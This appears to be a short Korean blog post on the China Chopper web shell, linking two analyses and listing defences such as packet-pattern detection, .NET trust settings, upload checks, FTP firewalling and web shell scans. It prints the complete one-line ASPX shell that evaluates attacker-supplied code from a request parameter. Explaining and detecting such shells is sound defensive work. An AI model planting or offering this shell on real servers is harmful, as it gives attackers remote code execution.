Example, test.aspx
<%@ Page Language="Jscript"%><%eval(Request.Item["memeber"],"unsafe");%>
China Chopper Webshell - the 4KB that Owns your Web Server
http://informationonsecurity.blogspot.kr/2012/11/china-chopper-webshell.html
Breaking Down the China Chopper Web Shell ? Part II
http://www.fireeye.com/blog/technical/botnet-activities-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html
- snort 류와 같은 솔루션/장비를 이용한 패킷 패턴 검출
- IIS 에서, .NET 신뢰수준 변경
- 웹사이트 업로드 경로에 허용되지 않은 파일 업로드 체크(코드수준)
- FTP 를 통해서 웹쉘 업로드가 가능하지 않도록 방화벽 제어
- 정기적인 웹쉘 스캔
....... 등등등............
댓글 없음:
댓글 쓰기